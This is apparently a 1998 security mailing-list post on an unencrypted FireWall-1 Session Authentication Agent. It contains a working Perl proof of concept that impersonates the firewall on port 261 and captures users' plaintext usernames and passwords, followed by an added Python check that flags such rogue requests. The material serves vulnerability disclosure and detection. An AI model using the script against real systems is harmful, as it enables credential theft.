`Date: Fri, 25 Sep 1998 18:24:58 -0400
From: Andrew Danforth <[email protected]>
Subject: Re: Firewall-1 3.0b Session Agent

On Fri, 25 Sep 1998, Brooke Paul wrote:
> > -----Original Message-----
> > From: Larry Pingree [SMTP:[email protected]]
> >
> > A problem exists in the Firewall-1 3.0b Session Agent
> >
> > All communications from the Firewall-1 Module to the session agent are
> > non-encrypted. Thus also allowing these communications to be snooped for
> > usernames and passwords.
>
> I think it's worth noting that Checkpoint states that the included
> Session Agent is a 'demo' and not officially supported. The real problem
> is the protocol they have defined. Even if you attempt to write a secure
> version it wouldn't interoperate with the firewall.

Where is that stated? I was unable to find any documentation stating that
the Authentication Agent is a demo. I'd be surprised if they advertised
Session Auth as a feature yet claimed that their Agent wasn't supported...

Here's the script that Larry referred to. I whipped it up during his FW-1
class, of all places... :)
---------- SNIP ----------
#!/usr/bin/perl -w
#
# This script connects to a FireWall-1 Session Authentication Agent
# running on Windows 95/NT. It attempts to "authenticate" the remote
# user and returns the resulting username/password.
#
# The agent supports configuration of up to three IP addresses which
# are allowed to submit authentication requests. If there are three
# addresses configured, the user is presented with the following when
# an unknown host connects:
#
# "Authentication request from this IP Address is not allowed."
# [ OK ]
#
# If there are only one or two addresses allowed, the user gets this
# nice little dialog box:
#
# "Do you want to enter this IP to the Firewall-1 list"
# [ YES ] (default) [ NO ]
#
# Guess which button your typical user will click on?
#
# If the agent closes the connection prematurely, you will get strange
# results.
#
# tested vs. FW-1 Authentication Agent 1.1
#
# Andrew Danforth <[email protected]>

require 5.000;

use Socket;
use Getopt::Std;

$| = 1;

$FIREWALL_NAME = "Corporate Firewall";
$PASSWORD_PROMPT = "FireWall-1 password";
$PORT = 261;

die unless getopts('n:p:');

unless ($TARGET_IP = shift) {
    print "usage: $0 [-n firewall_name] [-p password_prompt] target_ip\n";
    exit(1);
}

$FIREWALL_NAME = $opt_n if (defined $opt_n);
$PASSWORD_PROMPT = $opt_p if (defined $opt_p);

socket(SOCK, AF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "socket: $!";
connect(SOCK, sockaddr_in($PORT, inet_aton($TARGET_IP))) || die "connect: $!";
select(SOCK); $| = 1; select(STDOUT);

print SOCK "220 FW-1 Session Authentication Request from $FIREWALL_NAME\n\r";
print "sent greeting\n";
print SOCK "331 User:\n\r";
print "sent user request\n";
$username = &get_response;
print "username entered: $username\n";
print SOCK "331 *$PASSWORD_PROMPT:\n\r";
$password = &get_response;
print "password entered: $password\n";
print SOCK "200 User $username authenticated by FireWall-1 authentication.\n\r";
print SOCK "230 OK\n\r";

sub get_response {
    # this is ugly but it works. the session agent doesn't seem to send proper newlines.
    my $input;
    $input .= $key while($key = getc SOCK and ord($key));
    return $input;
}
`
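Added example, not part of the original post or of any Check Point tooling: since the agent answers any host that sends it the plaintext 220/331 prompts on TCP 261, a monitoring check can flag agent-port traffic whose source is not one of the site's real firewall modules. The record format, the IP addresses and the function name are assumptions made up for this sketch.

```python
import ipaddress
import re

AGENT_PORT = 261  # session agent port used by the script in the post
# Assumption: addresses of the site's real FireWall-1 modules (constructed).
FIREWALL_MODULES = {ipaddress.ip_address("10.0.0.1")}
# Reply codes the post's script sends to the agent: 220 greeting,
# 331 prompts, 200/230 completion.
SERVER_LINE = re.compile(r"^(220|331|200|230) ")

# Constructed records: "timestamp src dst dport first-line-of-payload"
SAMPLE_RECORDS = """\
1998-09-25T18:01:02 10.0.0.1 10.0.5.20 261 220 FW-1 Session Authentication Request from Corporate Firewall
1998-09-25T18:03:40 10.0.5.77 10.0.5.20 261 220 FW-1 Session Authentication Request from Corporate Firewall
1998-09-25T18:04:10 10.0.5.77 10.0.5.21 261 331 User:
1998-09-25T18:05:00 10.0.5.30 10.0.9.9 80 GET / HTTP/1.0
1998-09-25T18:06:00 10.0.5.88 10.0.5.22 261
not a record
"""

def find_rogue_requests(text, modules=FIREWALL_MODULES, port=AGENT_PORT):
    """Return (timestamp, src, dst, reason) for agent-port traffic not from a module."""
    findings = []
    for line in text.splitlines():
        parts = line.split(" ", 4)
        if len(parts) < 4:
            continue  # malformed record, skip it
        ts, src, dst, dport = parts[:4]
        payload = parts[4] if len(parts) == 5 else ""
        try:
            src_ip = ipaddress.ip_address(src)
            dport = int(dport)
        except ValueError:
            continue  # unparsable address or port
        if dport != port or src_ip in modules:
            continue  # other service, or a legitimate firewall module
        if SERVER_LINE.match(payload):
            reason = "session-auth prompt from unlisted host"
        else:
            reason = "connection to agent port from unlisted host"
        findings.append((ts, src, dst, reason))
    return findings

if __name__ == "__main__":
    for finding in find_rogue_requests(SAMPLE_RECORDS):
        print(*finding)
```
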